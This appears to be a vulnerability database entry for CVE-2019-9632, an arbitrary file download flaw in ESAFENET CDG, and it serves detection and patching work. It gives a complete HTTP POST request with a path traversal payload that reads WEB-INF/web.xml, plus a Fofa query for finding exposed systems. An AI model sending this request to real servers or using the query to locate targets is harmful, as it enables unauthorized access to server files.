🔙 목록으로 돌아가기

CVE-2019-9632: ESAFENET CDG - Arbitrary File Download

TitleESAFENET CDG - Arbitrary File Download
Authorpdteam
SeverityHigh
ImpactAttackers can download arbitrary files from the server, potentially leading to information disclosure or further exploitation.
RemediationApply the latest security patches or update to the latest version provided by ESAFENET.
CVSS Score7.5
EPSS Score0.79234
CVE IDCVE-2019-9632
Fofa Querytitle="电子文档安全管理系统"
Tags cve cve2019 esafenet lfi vuln

🔍 Vulnerability Description

ESAFENET CDG V3 and V5 has an arbitrary file download vulnerability via the fileName parameter in download.jsp because the InstallationPack parameter is mishandled in a /CDGServer3/ClientAjax request.

🌐 HTTP Request

POST /CDGServer3/ClientAjax HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (SS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
Connection: close
Content-Length: 77
Accept: */*
Accept-Language: en
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

command=downclientpak&InstallationPack=../WEB-INF/web.xml&forward=index.jsp

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2019/CVE-2019-9632.yaml

🦈 Packet Capture: ⬇️ Download cve-2019-9632.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A